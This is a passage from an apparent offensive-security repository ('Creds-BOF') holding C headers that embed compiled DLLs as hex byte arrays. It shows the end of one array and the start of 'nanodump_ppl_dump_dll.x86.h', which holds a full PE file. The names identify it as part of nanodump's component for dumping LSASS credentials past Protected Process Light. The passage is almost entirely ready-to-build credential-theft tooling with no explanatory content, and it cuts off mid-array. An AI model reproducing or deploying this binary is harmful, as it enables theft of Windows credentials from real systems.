C,0x6F,0x63,0x00,0x00,0xE8,0x03,0x4C,0x6F,0x63,0x61,0x6C,0x46,0x72,0x65,0x65,0x00,0x7F,0x05,0x53,0x6C,0x65,0x65,0x70,0x00,0xA2,0x05,0x54,0x6C,0x73,0x47,0x65,0x74,0x56,0x61,0x6C,0x75,0x65,0x00,0xD1,0x05,0x56,0x69,0x72,0x74,0x75,0x61,0x6C,0x50,0x72,0x6F,0x74,0x65,0x63,0x74,0x00,0x00,0xD3,0x05,0x56,0x69,0x72,0x74,0x75,0x61,0x6C,0x51,0x75,0x65,0x72,0x79,0x00,0x00,0x11,0x06,0x57,0x72,0x69,0x74,0x65,0x43,0x6F,0x6E,0x73,0x6F,0x6C,0x65,0x41,0x00,0x54,0x00,0x5F,0x5F,0x69,0x6F,0x62,0x5F,0x66,0x75,0x6E,0x63,0x00,0x00,0x78,0x00,0x5F,0x61,0x6D,0x73,0x67,0x5F,0x65,0x78,0x69,0x74,0x00,0x00,0x1D,0x01,0x5F,0x69,0x6E,0x69,0x74,0x74,0x65,0x72,0x6D,0x00,0x83,0x01,0x5F,0x6C,0x6F,0x63,0x6B,0x00,0xB3,0x02,0x5F,0x74,0x69,0x6D,0x65,0x36,0x34,0x00,0xCA,0x02,0x5F,0x75,0x6E,0x6C,0x6F,0x63,0x6B,0x00,0xE2,0x02,0x5F,0x76,0x73,0x63,0x70,0x72,0x69,0x6E,0x74,0x66,0x00,0x00,0xE8,0x02,0x5F,0x76,0x73,0x6E,0x70,0x72,0x69,0x6E,0x74,0x66,0x00,0x00,0x0B,0x03,0x5F,0x77,0x63,0x73,0x69,0x63,0x6D,0x70,0x00,0x00,0x87,0x03,0x61,0x62,0x6F,0x72,0x74,0x00,0x98,0x03,0x63,0x61,0x6C,0x6C,0x6F,0x63,0x00,0x00,0xC0,0x03,0x66,0x72,0x65,0x65,0x00,0x00,0xCD,0x03,0x66,0x77,0x72,0x69,0x74,0x65,0x00,0x00,0x00,0x04,0x6D,0x62,0x73,0x74,0x6F,0x77,0x63,0x73,0x00,0x00,0x04,0x04,0x6D,0x65,0x6D,0x63,0x6D,0x70,0x00,0x00,0x05,0x04,0x6D,0x65,0x6D,0x63,0x70,0x79,0x00,0x00,0x07,0x04,0x6D,0x65,0x6D,0x73,0x65,0x74,0x00,0x00,0x19,0x04,0x72,0x61,0x6E,0x64,0x00,0x00,0x1A,0x04,0x72,0x65,0x61,0x6C,0x6C,0x6F,0x63,0x00,0x2E,0x04,0x73,0x72,0x61,0x6E,0x64,0x00,0x35,0x04,0x73,0x74,0x72,0x63,0x6D,0x70,0x00,0x00,0x3C,0x04,0x73,0x74,0x72,0x6C,0x65,0x6E,0x00,0x00,0x3F,0x04,0x73,0x74,0x72,0x6E,0x63,0x6D,0x70,0x00,0x40,0x04,0x73,0x74,0x72,0x6E,0x63,0x70,0x79,0x00,0x43,0x04,0x73,0x74,0x72,0x72,0x63,0x68,0x72,0x00,0x60,0x04,0x76,0x66,0x70,0x72,0x69,0x6E,0x74,0x66,0x00,0x00,0x7A,0x04,0x77,0x63,0x73,0x6C,0x65,0x6E,0x00,0x00,0x7B,0x04,0x77,0x63,0x73,0x6E,0x63,0x61,0x74,0x00,0x7E,0x04,0x77,0x63,0x73,0x6E,0x63,0x70,0x79,0x00,0x82,0x04,0x77,0x63,0x73,0x72,0x63,0x68,0x72,0x00,0x85,0x04,0x77,0x63,0x73,0x73,0x74,0x72,0x00,0x00,0x8A,0x04,0x77,0x63,0x73,0x74,0x6F,0x6D,0x62,0x73,0x00,0x00,0x8C,0x04,0x77,0x63,0x73,0x74,0x6F,0x75,0x6C,0x00,0x00,0x90,0x01,0x00,0x00,0x90,0x01,0x00,0x00,0x90,0x01,0x00,0x00,0x90,0x01,0x00,0x00,0x90,0x01,0x00,0x00,0x90,0x01,0x00,0x00,0x90,0x01,0x00,0x00,0x90,0x01,0x00,0x00,0x90,0x01,0x00,0x00,0x90,0x01,0x00,0x00,0x90,0x01,0x00,0x00,0x90,0x01,0x00,0x00,0x90,0x01,0x00,0x00,0x90,0x01,0x00,0x00,0x90,0x01,0x00,0x00,0x90,0x01,0x00,0x00,0x90,0x01,0x00,0x00,0x90,0x01,0x00,0x00,0x90,0x01,0x00,0x4B,0x45,0x52,0x4E,0x45,0x4C,0x33,0x32,0x2E,0x64,0x6C,0x6C,0x00,0x00,0x00,0x00,0x14,0x90,0x01,0x00,0x14,0x90,0x01,0x00,0x14,0x90,0x01,0x00,0x14,0x90,0x01,0x00,0x14,0x90,0x01,0x00,0x14,0x90,0x01,0x00,0x14,0x90,0x01,0x00,0x14,0x90,0x01,0x00,0x14,0x90,0x01,0x00,0x14,0x90,0x01,0x00,0x14,0x90,0x01,0x00,0x14,0x90,0x01,0x00,0x14,0x90,0x01,0x00,0x14,0x90,0x01,0x00,0x14,0x90,0x01,0x00,0x14,0x90,0x01,0x00,0x14,0x90,0x01,0x00,0x14,0x90,0x01,0x00,0x14,0x90,0x01,0x00,0x14,0x90,0x01,0x00,0x14,0x90,0x01,0x00,0x14,0x90,0x01,0x00,0x14,0x90,0x01,0x00,0x14,0x90,0x01,0x00,0x14,0x90,0x01,0x00,0x14,0x90,0x01,0x00,0x14,0x90,0x01,0x00,0x14,0x90,0x01,0x00,0x14,0x90,0x01,0x00,0x14,0x90,0x01,0x00,0x14,0x90,0x01,0x00,0x14,0x90,0x01,0x00,0x14,0x90,0x01,0x00,0x6D,0x73,0x76,0x63,0x72,0x74,0x2E,0x64,0x6C,0x6C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0xC5,0xCA,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xA0,0xDF,0xC5,0xCA,0x01,0x00,0x00,0x00,0x70,0xDF,0xC5,0xCA,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xF0,0x00,0x00,0x0C,0x00,0x00,0x00,0xE8,0xA1,0x00,0x00,0x00,0x00,0x01,0x00,0x14,0x00,0x00,0x00,0x10,0xA0,0x40,0xA0,0x50,0xA0,0x60,0xA0,0x68,0xA0,0x70,0xA0,0x00,0x10,0x01,0x00,0x28,0x00,0x00,0x00,0x60,0xAD,0x80,0xAD,0x88,0xAD,0x90,0xAD,0x98,0xAD,0x50,0xAF,0x60,0xAF,0x70,0xAF,0x80,0xAF,0x90,0xAF,0xA0,0xAF,0xB0,0xAF,0xC0,0xAF,0xD0,0xAF,0xE0,0xAF,0xF0,0xAF,0x00,0x20,0x01,0x00,0x10,0x00,0x00,0x00,0x00,0xA0,0x10,0xA0,0x20,0xA0,0x00,0x00,0x00,0xA0,0x01,0x00,0x10,0x00,0x00,0x00,0x18,0xA0,0x30,0xA0,0x38,0xA0,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,};
unsigned int nanodump_ppl_dump_dll_len = 75264;


================================================
FILE: Creds-BOF/nanodump/include/nanodump_ppl_dump_dll.x86.h
================================================
#pragma once

unsigned char nanodump_ppl_dump_dll[] = {0x4D,0x5A,0x90,0x00,0x03,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0xFF,0xFF,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0x00,0x00,0x00,0x0E,0x1F,0xBA,0x0E,0x00,0xB4,0x09,0xCD,0x21,0xB8,0x01,0x4C,0xCD,0x21,0x54,0x68,0x69,0x73,0x20,0x70,0x72,0x6F,0x67,0x72,0x61,0x6D,0x20,0x63,0x61,0x6E,0x6E,0x6F,0x74,0x20,0x62,0x65,0x20,0x72,0x75,0x6E,0x20,0x69,0x6E,0x20,0x44,0x4F,0x53,0x20,0x6D,0x6F,0x64,0x65,0x2E,0x0D,0x0D,0x0A,0x24,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x50,0x45,0x00,0x00,0x4C,0x01,0x0A,0x00,0x9C,0x79,0x7A,0x68,0x00,0x0A,0x01,0x00,0x00,0x00,0x00,0x00,0xE0,0x00,0x0E,0x23,0x0B,0x01,0x02,0x29,0x00,0xBE,0x00,0x00,0x00,0x06,0x01,0x00,0x00,0x1C,0x00,0x00,0xB0,0x13,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0xD0,0x00,0x00,0x00,0x00,0x48,0x65,0x00,0x10,0x00,0x00,0x00,0x02,0x00,0x00,0x04,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xA0,0x01,0x00,0x00,0x04,0x00,0x00,0x2B,0xC1,0x01,0x00,0x03,0x00,0x40,0x01,0x00,0x00,0x20,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x50,0x01,0x00,0xC5,0x01,0x00,0x00,0x00,0x60,0x01,0x00,0xD8,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x90,0x01,0x00,0x80,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC8,0xEC,0x00,0x00,0x18,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x24,0x61,0x01,0x00,0xE8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x2E,0x74,0x65,0x78,0x74,0x00,0x00,0x00,0x74,0xBD,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0xBE,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x60,0x00,0x00,0x60,0x2E,0x64,0x61,0x74,0x61,0x00,0x00,0x00,0xA8,0x00,0x00,0x00,0x00,0xD0,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0xC2,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0xC0,0x2E,0x72,0x64,0x61,0x74,0x61,0x00,0x00,0x6C,0x11,0x00,0x00,0x00,0xE0,0x00,0x00,0x00,0x12,0x00,0x00,0x00,0xC4,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x40,0x2F,0x34,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x21,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x22,0x00,0x00,0x00,0xD6,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x40,0x2E,0x62,0x73,0x73,0x00,0x00,0x00,0x00,0x80,0x1A,0x00,0x00,0x00,0x30,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0x00,0x00,0xC0,0x2E,0x65,0x64,0x61,0x74,0x61,0x00,0x00,0xC5,0x01,0x00,0x00,0x00,0x50,0x01,0x00,0x00,0x02,0x00,0x00,0x00,0xF8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x40,0x2E,0x69,0x64,0x61,0x74,0x61,0x00,0x00,0xD8,0x05,0x00,0x00,0x00,0x60,0x01,0x00,0x00,0x06,0x00,0x00,0x00,0xFA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0xC0,0x2E,0x43,0x52,0x54,0x00,0x00,0x00,0x00,0x2C,0x00,0x00,0x00,0x00,0x70,0x01,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0xC0,0x2E,0x74,0x6C,0x73,0x00,0x00,0x00,0x00,0x08,0x00,0x00,0x00,0x00,0x80,0x01,0x00,0x00,0x02,0x00,0x00,0x00,0x02,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0xC0,0x2E,0x72,0x65,0x6C,0x6F,0x63,0x00,0x00,0x80,0x05,0x00,0x00,0x00,0x90,0x01,0x00,0x00,0x06,0x00,0x00,0x00,0x04,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x42,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x55,0x89,0xE5,0x83,0xEC,0x18,0xC7,0x04,0x24,0x00,0x30,0x49,0x65,0xE8,0x4E,0xBA,0x00,0x00,0xC9,0xC3,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x8D,0x74,0x26,0x00,0x55,0x89,0xE5,0x57,0x56,0x53,0x83,0xEC,0x1C,0x8B,0x45,0x0C,0x85,0xC0,0x75,0x70,0xA1,0x0C,0x30,0x49,0x65,0x31,0xD2,0x85,0xC0,0x7E,0x55,0x83,0xE8,0x01,0x8B,0x3D,0x68,0x61,0x49,0x65,0x31,0xF6,0xA3,0x0C,0x30,0x49,0x65,0xEB,0x0F,0x8D,0x76,0x00,0xC7,0x04,0x24,0xE8,0x03,0x00,0x00,0xFF,0xD7,0x83,0xEC,0x04,0xBA,0x01,0x00,0x00,0x00,0x89,0xF0,0xF0,0x0F,0xB1,0x15,0x24,0x4A,0x49,0x65,0x89,0xC3,0x85,0xC0,0x75,0xDF,0xA1,0x28,0x4A,0x49,0x65,0x83,0xF8,0x02,0x0F,0x84,0xC9,0x00,0x00,0x00,0xC7,0x04,0x24,0x1F,0x00,0x00,0x00,0xE8,0x45,0xBB,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x8D,0x65,0xF4,0x89,0xD0,0x5B,0x5E,0x5F,0x5D,0xC2,0x0C,0x00,0x8D,0x74,0x26,0x00,0x83,0xF8,0x01,0x75,0xE6,0x64,0xA1,0x18,0x00,0x00,0x00,0x8B,0x35,0x68,0x61,0x49,0x65,0x8B,0x78,0x04,0x31,0xDB,0xEB,0x1C,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x39,0xC7,0x0F,0x84,0xA8,0x00,0x00,0x00,0xC7,0x0